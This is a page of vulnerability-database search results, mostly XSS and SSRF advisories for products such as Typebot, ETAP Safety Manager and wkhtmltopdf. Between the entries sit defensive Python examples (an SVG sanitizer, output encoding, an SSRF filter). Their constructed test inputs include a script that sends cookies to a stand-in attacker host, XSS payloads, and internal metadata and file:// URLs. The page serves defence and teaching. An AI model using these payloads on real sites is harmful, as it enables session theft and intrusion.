58 matches found

CNNVD
added 2026/05/22 12:00 a.m., 5 views

Typebot security vulnerability

Typebot is an open-source chatbot builder developed by Baptiste Arnaud. Typebot versions 3.15.2 and earlier contained security vulnerabilities, which stemmed from the RatingButton component in the embed package using Solid's innerHTML directive to render the customIcon.svg fiel...

8.7 CVSS, 6 AI score, 0.00031 EPSS
Exploits 0, References 3
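The Typebot entry above describes an SVG taken from a user-controlled field and handed to innerHTML, which turns any <script>, on* handler, javascript: reference or <foreignObject> inside the file into code running in the embedding page. The block below is an added example of the allowlist sanitizer a practitioner would put in front of such a render path; it is not Typebot's code. It parses the SVG as XML (which keeps case-sensitive names like viewBox intact), keeps only drawing elements and presentation attributes, allows href only as a same-document fragment, and refuses documents with a DTD so no entity expansion can happen. The element and attribute lists, and the malicious icon it is run against, are this example's own choices.

```python
"""Allowlist-based SVG sanitizer (added example, not Typebot's code)."""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # serialize with a default xmlns, not ns0:
ET.register_namespace("xlink", XLINK_NS)

# Elements and attributes we are willing to hand to innerHTML. Anything not listed
# (script, style, foreignObject, a, image, animate, set, ...) is removed with its
# subtree. These lists are the example's choice, not a standard.
ALLOWED_TAGS = {
    "svg", "g", "defs", "symbol", "title", "desc", "path", "rect", "circle",
    "ellipse", "line", "polyline", "polygon", "text", "tspan", "use", "clipPath",
    "linearGradient", "radialGradient", "stop",
}
ALLOWED_ATTRS = {
    "id", "class", "viewBox", "width", "height", "x", "y", "x1", "y1", "x2", "y2",
    "cx", "cy", "r", "rx", "ry", "d", "points", "transform", "fill", "stroke",
    "stroke-width", "stroke-linecap", "stroke-linejoin", "opacity", "fill-opacity",
    "stroke-opacity", "fill-rule", "clip-path", "offset", "stop-color",
    "stop-opacity", "gradientUnits",
}
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}
MAX_BYTES = 64 * 1024


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}rect' -> 'rect'."""
    return qname.rsplit("}", 1)[-1]


def _scrub(elem: ET.Element) -> None:
    for child in list(elem):
        if _local(child.tag) not in ALLOWED_TAGS:
            elem.remove(child)             # drops <script>, <foreignObject>, <a>, ... entirely
        else:
            _scrub(child)
    for name in list(elem.attrib):
        local = _local(name)
        if local.lower().startswith("on"):
            del elem.attrib[name]          # onload, onclick, onbegin, ...
        elif name in URL_ATTRS:
            # Only same-document references such as <use href="#icon"> survive;
            # javascript:, data:, http(s): and protocol-relative URLs do not.
            if not elem.attrib[name].strip().startswith("#"):
                del elem.attrib[name]
        elif local not in ALLOWED_ATTRS:
            del elem.attrib[name]          # style=, xml:base=, unknown attributes


def sanitize_svg(svg_text: str) -> str:
    """Return a scrubbed SVG document, or raise ValueError if it cannot be made safe."""
    if len(svg_text.encode("utf-8")) > MAX_BYTES:
        raise ValueError("svg too large")
    if "<!DOCTYPE" in svg_text.upper() or "<!ENTITY" in svg_text.upper():
        raise ValueError("DTD not allowed")   # no entity expansion, no external entities
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("root element must be <svg>")
    _scrub(root)
    return ET.tostring(root, encoding="unicode")


# Constructed malicious "custom icon" for the demonstration.
EVIL_ICON = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     viewBox="0 0 24 24" onload="alert(document.cookie)">
  <script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(1)"/></body></foreignObject>
  <a xlink:href="javascript:alert(1)"><rect width="24" height="24" fill="red" onclick="alert(1)"/></a>
  <use href="#star"/>
  <use xlink:href="https://attacker.invalid/x.svg#star"/>
  <circle cx="12" cy="12" r="5" style="fill:url(https://attacker.invalid/track)" fill="blue"/>
</svg>"""

if __name__ == "__main__":
    print(sanitize_svg(EVIL_ICON))
```

Deny-by-default is the point: a blocklist of "dangerous" tags misses the next SVG feature that can reference a URL or run a script, while an allowlist only ever lets through what was reviewed. In a browser-side embed the equivalent step is a maintained sanitizer with an SVG profile (DOMPurify is the usual choice) applied before the string reaches innerHTML, or simply rendering the icon through an <img> element, which never executes script.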
EUVD
added 2025/10/03 8:07 p.m., 1 view

EUVD-2023-32309

Malicious code in bioql PyPI...

7.5 CVSS, 6.3 AI score, 0.02997 EPSS
Exploits 1, References 1
Kitploit
added 2024/09/24 11:30 a.m., 195 views

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

SafeLine is a self-hosted WAF (Web Application Firewall) that protects your web apps from attacks and exploits. A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL...

7.5 AI score
Exploits 0, References 1
Cvelist
added 2024/09/03 4:52 p.m., 18 views

CVE-2024-43412 Xibo CMS XSS vulnerability when previewing files uploaded to the library containing HTML/JS

Xibo is an open source digital signage platform with a web content management system (CMS). Prior to version 4.1.0, a cross-site scripting vulnerability in Xibo CMS allows authorized users to execute arbitrary JavaScript via the file preview function. Users can upload HTML/CSS/JS files into the Xib...

4.6 CVSS, 0.00832 EPSS
Exploits 0, References 2
OSV
added 2024/08/20 8:23 p.m., 11 views

CVE-2024-43396 Khoj Vulnerable to Stored Cross-site Scripting In Automate (Preview feature)

Khoj is an application that creates personal AI agents. The Automation feature allows a user to insert arbitrary HTML inside the task instructions, resulting in a Stored XSS. The q parameter for the /api/automation endpoint does not get correctly sanitized when rendered on the page, resulting in...

5.4 CVSS, 6.2 AI score, 0.00924 EPSS
Exploits 1, References 5
CVE
added 2024/08/20 8:23 p.m., 76 views

CVE-2024-43396

CVE-2024-43396 concerns Khoj, an open-source app for personal AI agents. The vulnerability is a Stored XSS in the Automation feature caused by insufficient sanitization of the q parameter in the /api/automation endpoint, allowing injection of arbitrary HTML/JS when the payload is rendered on the ...

5.4 CVSS, 5.3 AI score, 0.00924 EPSS
Exploits 1, References 3, Affected Software 1
Huntr
added 2023/06/10 5:05 p.m., 17 views

Stored XSS via Default session expiration time

Description: The Default session expiration time feature, when submitted with HTML/JS tags, executes the code in the login page. Proof of Concept: Log in to Teampass and go to Settings = Options (http://127.0.0.1/index.php?page=options). In the Default session expiration time input field, insert an XSS payload...

4.9 CVSS, 6.4 AI score, 0.00119 EPSS
Exploits 1, References 1
Exploit DB
added 2023/04/06 12:00 a.m., 275 views

Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS

Exploit Title: Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage...

7.4 AI score
Exploits 0
NVD
added 2023/03/28 9:15 p.m., 11 views

CVE-2023-28648

Osprey Pump Controller version 1.01: inputs passed to a GET parameter are not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in the context of an affected site...

7.5 CVSS, 7.9 AI score, 0.02997 EPSS
Exploits 1, References 1
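The Osprey Pump Controller entry above, like the ETAP Safety Manager, Teampass, ZoneMinder, Khoj and Savsoft Quiz items on this page, comes down to one defect: a request parameter or stored field is echoed into a page without being encoded for the context it lands in. The block below is an added example, not code from any of those products, showing the same reflected parameter rendered three ways and driven with constructed payloads: raw concatenation (the vulnerable pattern), html.escape for element content and quoted attributes, and a JSON-plus-\u00XX encoding for values that end up inside a <script> block, where html.escape is the wrong tool and json.dumps alone still lets a literal </script> close the block. The page template and payloads are constructed for the example.

```python
"""Context-aware output encoding for an echoed parameter (added example)."""
import html
import json
import re

# Constructed payloads, each aimed at one of the three contexts the page uses.
BODY_PAYLOAD = "<script>alert(1)</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'
SCRIPT_PAYLOAD = "</script><script>alert(1)</script>"


def render_vulnerable(q: str) -> str:
    """What the affected products effectively do: the raw parameter lands in three contexts."""
    return (
        f"<h1>Results for {q}</h1>\n"
        f'<input name="q" value="{q}">\n'
        f'<script>var q = "{q}";</script>'
    )


def js_string(value: str) -> str:
    """Encode a str as a JavaScript string literal that is safe inside a <script> block.

    json.dumps escapes quotes, backslashes and (with ensure_ascii) all non-ASCII,
    but leaves <, > and & untouched, so a '</script>' in the value would still end
    the block. \\u00XX escapes are invisible to the HTML parser and decode to the
    same characters in JavaScript.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_hardened(q: str) -> str:
    """Same page; each context gets the encoding that context needs."""
    safe = html.escape(q, quote=True)              # & < > " ' become entities
    return (
        f"<h1>Results for {safe}</h1>\n"
        f'<input name="q" value="{safe}">\n'       # only valid because the attribute is quoted
        f"<script>var q = {js_string(q)};</script>"  # js_string supplies its own quotes
    )


_HANDLER = re.compile(r"""\son\w+\s*=\s*["']""")


def breaks_out(page: str) -> bool:
    """Heuristic for the demo only: a second <script or a quoted on*= handler appeared."""
    lowered = page.lower()
    return lowered.count("<script") > 1 or _HANDLER.search(lowered) is not None


if __name__ == "__main__":
    for payload in (BODY_PAYLOAD, ATTR_PAYLOAD, SCRIPT_PAYLOAD):
        print(f"{payload!r}: vulnerable={breaks_out(render_vulnerable(payload))}"
              f" hardened={breaks_out(render_hardened(payload))}")
```

Two details carry the lesson. The attribute case is only safe because the attribute is quoted; an unquoted value="{safe}" would still accept a space-separated on* handler, since html.escape does not touch spaces. And the script case shows why "sanitize the input" is the wrong framing in the advisories above: the same string needs a different encoding per context, so the fix belongs at the output, where the context is known, which is what templating engines with auto-escaping do for you.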
Prion
added 2022/11/15 10:15 p.m., 22 views

Cross site scripting

A Stored Cross Site Scripting (XSS) issue in ZoneMinder 1.36.12 allows an attacker to execute HTML or JavaScript code via the Username field when an Admin, or a non-Admin user who can see other users logged into the platform, clicks on Logout. NOTE: this exists in later versions than CVE-2019-7348 an...

4.9 CVSS, 5.5 AI score, 0.00213 EPSS
Exploits 1, References 2, Affected Software 1
Prion
added 2022/09/28 2:15 p.m., 8 views

Cross site scripting

ETAP Lighting International NV ETAP Safety Manager 1.0.0.32 is vulnerable to Cross Site Scripting (XSS). Input passed to the GET parameter 'action' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in...

5.8 CVSS, 6.3 AI score, 0.00118 EPSS
Exploits 1, References 1, Affected Software 1
Cvelist
added 2022/09/28 1:50 p.m., 12 views

CVE-2022-40912

ETAP Lighting International NV ETAP Safety Manager 1.0.0.32 is vulnerable to Cross Site Scripting (XSS). Input passed to the GET parameter 'action' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in...

6.5 AI score, 0.00118 EPSS
Exploits 1, References 1
0day.today
added 2022/09/13 12:00 a.m., 255 views

ESM ETAP Safety Manager 1.0.0.32 Cross Site Scripting Vulnerability

ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS Vendor: ETAP Lighting International NV Product web page: https://www.etaplighting.com Affected version: 1.0.0.32 Summary: The ETAP Safety Manager ESM is a central managing and control system that helps you to monitor, adjust and...

0.3 AI score
Exploits 0
Packet Storm
added 2022/09/12 12:00 a.m., 290 views

ETAP Safety Manager 1.0.0.32 Cross Site Scripting

ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS Vendor: ETAP Lighting International NV Product web page: https://www.etaplighting.com Affected version: 1.0.0.32 Summary: The ETAP Safety Manager ESM is a central managing and control system that helps you to monitor, adjust and...

0.3 AI score
Exploits 0
UbuntuCve
added 2022/08/22 4:15 p.m., 25 views

CVE-2022-35583

wkhtmltopdf 0.12.6 is vulnerable to SSRF, which allows an attacker to get initial access into the target's system by injecting an iframe tag whose source points at an internal asset's IP address. This allows the attacker to take over the whole infrastructure by accessing its internal assets...

9.8 CVSS, 7.2 AI score, 0.59135 EPSS
Exploits 4, References 3
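The wkhtmltopdf entry above is the server-side-renderer form of SSRF: the converter fetches whatever URL an iframe, img, script or stylesheet tag names, so a document that a user can influence turns PDF export into requests from inside the network. The block below is an added example of the pre-render check a practitioner would apply to the HTML, not part of wkhtmltopdf or of the CVE. It collects every URL the renderer would request, resolves relative and scheme-relative forms against the document's own URL, allows only http(s) to an allowlisted asset host, and rejects every IP literal after normalising decimal and IPv4-mapped IPv6 spellings, so 2130706433 and [::ffff:7f00:1] are recognised as 127.0.0.1. The allowlisted host, the document base URL and the sample page are constructed for the example.

```python
"""SSRF filter for HTML handed to a server-side renderer (added example)."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumptions for the example: the only host the renderer may fetch assets from,
# and the URL the document being rendered is considered to live at.
ALLOWED_ASSET_HOSTS = {"cdn.example.invalid"}
DOCUMENT_BASE = "https://cdn.example.invalid/export/report.html"

# (tag, attribute) pairs a renderer fetches while laying out a page.
FETCH_ATTRS = {
    ("iframe", "src"), ("frame", "src"), ("img", "src"), ("script", "src"),
    ("link", "href"), ("embed", "src"), ("object", "data"), ("source", "src"),
    ("video", "src"), ("video", "poster"), ("audio", "src"), ("input", "src"),
}


def _literal_ip(host: str):
    """Return an ip_address if `host` is an IP literal in a spelling we can decode, else None."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        if not host.isdigit():            # 0x7f000001 / 0177.0.0.1 stay "names" and fail the allowlist
            return None
        try:
            ip = ipaddress.ip_address(int(host))   # 2130706433 -> 127.0.0.1
        except ValueError:
            return None
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped               # ::ffff:7f00:1 -> 127.0.0.1
    return ip


def check_url(url: str, base: str = DOCUMENT_BASE) -> tuple[bool, str]:
    """Decide whether the renderer may fetch `url`; returns (allowed, reason)."""
    parts = urlsplit(urljoin(base, url.strip()))   # resolves /path and //host forms against the document
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not fetchable"   # file:, ftp:, data:, gopher:, ...
    host = parts.hostname                 # lowercased, IPv6 brackets and user@ prefix removed
    if not host:
        return False, "no host"
    ip = _literal_ip(host)
    if ip is not None:                    # a literal can never equal an allowlisted name
        return False, f"literal {'public' if ip.is_global else 'non-public'} address {ip}"
    if host in ALLOWED_ASSET_HOSTS:
        return True, "allowlisted host"
    # Any other name would resolve through DNS we do not control (rebinding), so deny it too.
    return False, f"host {host!r} not allowlisted"


class _FetchScanner(HTMLParser):
    """Collect every URL a renderer would request for this page."""

    def __init__(self) -> None:
        super().__init__()
        self.urls: list[str] = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: v for k, v in attrs if v is not None}
        self.urls += [v for k, v in attrs.items() if (tag, k) in FETCH_ATTRS]
        if tag in ("img", "source") and "srcset" in attrs:
            self.urls += [c.split()[0] for c in attrs["srcset"].split(",") if c.strip()]
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            for part in attrs.get("content", "").split(";"):
                if part.strip().lower().startswith("url="):
                    self.urls.append(part.strip()[4:].strip("'\" "))


def rejected_urls(html_doc: str, base: str = DOCUMENT_BASE) -> list[tuple[str, str]]:
    """Return (url, reason) for every fetch the renderer must not be allowed to make."""
    scanner = _FetchScanner()
    scanner.feed(html_doc)
    scanner.close()
    rejected = []
    for url in scanner.urls:
        ok, reason = check_url(url, base)
        if not ok:
            rejected.append((url, reason))
    return rejected


# Constructed document mixing legitimate assets with SSRF attempts.
SAMPLE_HTML = """<html><body>
<img src="https://cdn.example.invalid/logo.png">
<img src="/relative/logo.png">
<img src="http://cdn.example.invalid@127.0.0.1/">
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"></iframe>
<iframe src="file:///etc/passwd"></iframe>
<img src="//10.0.0.5/admin">
<script src="http://2130706433/a.js"></script>
<link rel="stylesheet" href="http://[::ffff:7f00:1]/a.css">
<img src="http://evil.example.invalid/track.png">
<meta http-equiv="refresh" content="0;url=http://192.168.1.1/">
</body></html>"""

if __name__ == "__main__":
    for url, reason in rejected_urls(SAMPLE_HTML):
        print(f"BLOCK {url}  ({reason})")
```

The filter is deliberately a deny-by-default allowlist rather than a list of bad ranges: a blocklist has to keep up with every spelling of 127.0.0.1 and every cloud metadata address, while an allowlist only has to name the hosts the export genuinely needs. Treat it as one layer: CSS url() and @import, redirects from an allowed host, and the renderer's own file access (wkhtmltopdf's --disable-local-file-access covers only the file: case) still need handling, and the converter should run with egress restricted so a miss here cannot reach the internal network anyway.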
Tenable Nessus
added 2022/03/11 12:00 a.m., 35 views

SUSE SLED15 / SLES15 Security Update : python-lxml (SUSE-SU-2022:0803-1)

The remote SUSE Linux SLED15 / SLEDSAP15 / SLES15 / SLESSAP15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:0803-1 advisory. - An issue was discovered in lxml before 4.2.5. lxml/html/clean.py in the lxml.html.clean module does not remo...

8.2 CVSS, 7.2 AI score, 0.05428 EPSS
Exploits 3, References 13
IBM Security Bulletins
added 2022/02/21 1:13 a.m., 25 views

Security Bulletin: IBM Aspera Shares 1.9.14 Patch Level 1 and earlier are vulnerable to DOM XSS

Summary DOM XSS on IBM Aspera Shares 1.9.14 Patch Level 1 and earlier could lead to HTML/JS injection and Account takeover. Vulnerability Details CVEID: CVE-2020-4731 DESCRIPTION: IBM Aspera Web Application is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary...

6.1 CVSS, 5.8 AI score, 0.00131 EPSS
Exploits 0, Affected Software 1
Tenable Nessus
added 2021/09/14 12:00 a.m., 32 views

EulerOS 2.0 SP2 : python-lxml (EulerOS-SA-2021-2431)

According to the version of the python-lxml package installed, the EulerOS installation on the remote host is affected by the following vulnerability: An XSS vulnerability was discovered in python-lxml's clean module. The module's parser didn't properly imitate browsers, which caused different...

6.1 CVSS, 7.2 AI score, 0.01246 EPSS
Exploits 1, References 2
Amazon
added 2021/06/23 12:00 a.m., 68 views

Medium: python-lxml

Issue Overview: A Cross-site Scripting (XSS) vulnerability was found in the python-lxml's clean module. The module's parser did not properly imitate browsers, causing different behaviors between the sanitizer and the user's page. This flaw allows a remote attacker to run arbitrary HTML/JS code. The...

6.1 CVSS, 6.5 AI score, 0.01246 EPSS
Exploits 1
Exploit DB
added 2021/05/05 12:00 a.m., 157 views

Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting

Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting Date: 2021-05-04 Exploit Author: strider Software Link: https://github.com/savsofts/savsoftquizv5 Vendor: https://savsoftquiz.com Version: 5.0 Tested on: Ubuntu 20.04 LTS / Kali Linux...

7.4 AI score
Exploits 0